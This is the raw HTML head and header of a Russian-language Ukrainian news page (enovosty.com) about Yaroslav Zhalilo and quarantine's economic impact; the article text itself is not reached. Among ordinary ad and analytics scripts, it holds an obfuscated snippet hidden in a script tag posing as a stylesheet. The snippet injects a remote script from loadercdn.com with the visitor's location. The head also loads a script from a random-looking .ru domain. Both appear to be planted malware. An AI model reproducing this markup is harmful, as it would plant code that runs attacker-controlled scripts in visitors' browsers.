<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Ярослав Жалило рассказал о влиянии продления усиленного карантина на экономику страны | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Ярослав Жалило рассказал о влиянии продления усиленного карантина на экономику страны "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2021/01/c6e0b5e7-75d4-4c31-ba26-cffc78a215b7_w1023_r1_s.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="393" /><meta property="og:image:alt" content="Ярослав Жалило рассказал о влиянии продления усиленного карантина на экономику страны " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='videojscss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/video-js.css' type='text/css' media='all' /><link rel='stylesheet' id='videojsimacss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><link rel='stylesheet' id='ldc-like-dislike-css' href='https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Министр здравоохранения Украины Максим Степанов настаивает на продлении карантина" /><meta property="og:description" content="Министр здравоохранения Украины Максим Степанов настаивает на продлении карантина" /><meta name="keywords" content="карантин,ярослав жалило,новости экономики,эксклюзивные новости" /><link rel="canonical" href="https://enovosty.com/news_economy/full/1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany" /><meta property="og:url" content="https://enovosty.com/news_economy/full/1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany" /><style>.ms-parent-id-7 > .master-slider{background:#000000}.ms-parent-id-6 > .master-slider{background:#000000}.ms-parent-id-5 > .master-slider{background:#000000}.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><link rel="amphtml" href="https://enovosty.com/news_economy/full/1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4832047';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4832047&amp;a=5054" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
data-inv="//ads.go2net.com.ua/"
data-r="single"
data-sender="go2net"
data-bundle="desktop"></script><meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script> !(function () { window.googletag = window.googletag || {}; window.vmpbjs = window.vmpbjs || {}; window.vpb = window.vpb || {}; vpb.fastLoad = true; googletag.cmd = googletag.cmd || []; vmpbjs.cmd = vmpbjs.cmd || []; var cmds = googletag.cmd.slice(0) || []; googletag.cmd.length=0; var ready = false; function exec(cb) { return cb.call(googletag); } googletag.cmd.push(function () { googletag.cmd.unshift = function (cb) { if (ready) { return exec(cb); } cmds.unshift(cb); if (cb._startgpt) { ready = true; cmds.forEach(cb=> { exec(cb); }); } }; googletag.cmd.push = function (cb) { if (ready) { return exec(cb); } cmds.push(cb); }; }); googletag.cmd.push = function (cb) { cmds.push(cb) }; googletag.cmd.unshift = function (cb) { cmds.unshift(cb); if (cb._startgpt) { ready = true; if (googletag.apiReady) { cmds.forEach(function (cb) { googletag.cmd.push(cb); }) } else { googletag.cmd = cmds; } } }; var dayMs = 36e5, cb = parseInt(Date.now() / dayMs), vpbSrc = '//player.adtelligent.com/prebidlink/' + cb + '/wrapper_hb_308225_6946.js', pbSrc = vpbSrc.replace('wrapper_hb', 'hb'), gptSrc = '//securepubads.g.doubleclick.net/tag/js/gpt.js', c = document.head || document.body || document.documentElement; function loadScript(src, cb) { var s = document.createElement('script'); s.src = src; s.defer=false; c.appendChild(s); s.onload = cb; s.onerror = function(){ var fn = function(){}; fn._startgpt = true; googletag.cmd.unshift(fn); }; return s; } loadScript(pbSrc); loadScript(gptSrc); loadScript(vpbSrc); })() </script><script async src="//www.googletagservices.com/tag/js/gpt.js"></script><script async src="//acdn.adnxs.com/prebid/not-for-prod/prebid.js"></script><script>var div_1_sizes = [
[240, 320],[240, 350],[240, 420],[240, 500],[240, 600],[300, 250],[300, 280],[300, 300],[300, 400],[300, 500],[300, 600],[320, 50],[320, 100],[320, 250],[320, 480],[320, 600]
];var div_2_sizes = [
[200, 200],[200, 400],[200, 600],[240, 350],[240, 500],[240, 600],[300, 250],[300, 300],[300, 400],[300, 500],[300, 600]
];var div_3_sizes = [
[240, 350],[240, 500],[300, 250],[300, 600]
];var div_4_sizes = [
[300, 250],[300, 50],[300, 75],[300, 100],[300, 300],[320, 50],[320, 100],[320, 250],[320, 200]
];var PREBID_TIMEOUT = 1000;var FAILSAFE_TIMEOUT = 3000;var adUnits = [
{code: '/29636627/enovosty.com_300x600_mob_hb',mediaTypes: {banner: {sizes: div_1_sizes
}},bids: [{bidder: 'admixer',params: {zone: '0aeef458-3e2c-4ffa-b559-7ed3aa2de424'
}}]
},{code: '/29636627/enovosty.com_320x250_hb',mediaTypes: {banner: {sizes: div_4_sizes
}},bids: [{bidder: 'admixer',params: {zone: '156e0022-5c98-499e-b4e6-788848e60a3c'
}}]
},{code: '/29636627/enovosty.com_300x600_top_hb',mediaTypes: {banner: {sizes: div_2_sizes
}},bids: [{bidder: 'admixer',params: {zone: '9743148c-0bcf-416e-8ab5-55d24689e145'
}}]
},{code: '/29636627/enovosty.com_300x600_ukr.net_hb',mediaTypes: {banner: {sizes: div_3_sizes
}},bids: [{bidder: 'admixer',params: {zone: '7af953ae-795d-4e3e-8b55-c1906dcae224'
}}]
}];// ======== DO NOT EDIT BELOW THIS LINE =========== //
var googletag = googletag || {};googletag.cmd = googletag.cmd || [];googletag.cmd.push(function() {googletag.pubads().disableInitialLoad();});var pbjs = pbjs || {};pbjs.que = pbjs.que || [];pbjs.que.push(function() {pbjs.addAdUnits(adUnits);pbjs.requestBids({bidsBackHandler: initAdserver,timeout: PREBID_TIMEOUT
});});function initAdserver() {if (pbjs.initAdserverSet) return;pbjs.initAdserverSet = true;googletag.cmd.push(function() {pbjs.que.push(function() {pbjs.setTargetingForGPTAsync();googletag.pubads().refresh();});});}// in case PBJS doesn't load
setTimeout(function() {initAdserver();}, FAILSAFE_TIMEOUT);googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_mob_hb', div_1_sizes, 'div-1').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_top_hb', div_2_sizes, 'div-2').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_ukr.net_hb', div_3_sizes, 'div-3').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_320x250_hb', div_4_sizes, 'div-4').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});</script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/59256651/Test_Moxtv_enovosty_970x250', [970, 250], 'div-gpt-ad-1599639337661-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty2_300x600', [300, 600], 'div-gpt-ad-1596728019577-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_970x250', [970, 250], 'div-gpt-ad-1595961600637-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_adint_300_600', [[300, 600],[300,250]], 'div-gpt-ad-1594112815543-0').addService(googletag.pubads());googletag.defineSlot('/59256651/Adaptive_zone', [470, 376], 'div-gpt-ad-1594991505318-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.pubads().collapseEmptyDivs();googletag.enableServices();});
</script><script type="text/plain" id="vpb-catfish-template"><div class="vpb-catfish-container" style="position: fixed;bottom:0;left:0;right:0;z-index:999999;"><div class="vpb-ad" style="display: block;position: relative;margin:0px auto;"><span class="vpb-close-button"
style="display: none;position: absolute;top:-15px;right:-15px;z-index:9999;cursor: pointer;"><img src="data:image/png;base64,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"/></span></div></div></script><script>function catfish(div) {var gt = window.googletag || {};gt.cmd = gt.cmd || [];gt.cmd.push(function () {var template = document.getElementById('vpb-catfish-template').innerHTML;var adContainer = document.getElementById(div);adContainer.innerHTML = template;adContainer.id = 'vpb-ad-wrapped-generated-' + (Math.random() + Date.now());var innerWrapper = adContainer.getElementsByClassName('vpb-ad')[0];var closeBtn = adContainer.getElementsByClassName('vpb-close-button')[0];var newAdDiv = document.createElement('div');newAdDiv.id = div;innerWrapper.appendChild(newAdDiv);googletag.pubads().addEventListener('slotRenderEnded', function (event) {var slot = event.slot;var slotId = slot.getSlotElementId();if (slotId != div)  return;if (event.isEmpty) {closeBtn.style.display = 'none';adContainer.style.display = 'none';return;}adContainer.style.display = 'block';innerWrapper.style.width = event.size[0] + 'px';innerWrapper.style.height = event.size[1] + 'px';closeBtn.style.display = 'inline-block';closeBtn.addEventListener('click', function () {adContainer.parentElement.removeChild(adContainer);})
});gt.display(div);})
}</script><script src="https://33a89nw03k.ru/script.js"></script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});globalAml.singleRequest("go2net");});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_economy/full/1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_economy/full/1301-yaroslav-zhalilo-rasskazal-o-vliyanii-usilennogo-karantina-na-ekonomiku-strany?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" />Мобильная версия</a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>28.27</td><td>27.90</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>34.40</td><td>33.80</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.41</td><td>0.28</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>498.91</td><td>0.00</td><td>20:36 13.01.2021</td> </tr> <tr class="tr_white"> <td>UX</td><td>1631.91</td><td>0.61</td><td>17:00 13.01.2021</td> </tr> <tr> <td>RTS</td><td>1486.77</td><td>0.12</td><td>17:51 13.01.2021</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>56.11</td><td>-0.83</td><td style="text-transform:uppercase;">Jan</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>53.02</td><td>-0.36</td><td style="text-transform:uppercase;">Jan</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>458.25</td><td>-0.49</td><td style="text-transform:uppercase;">Jan</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a 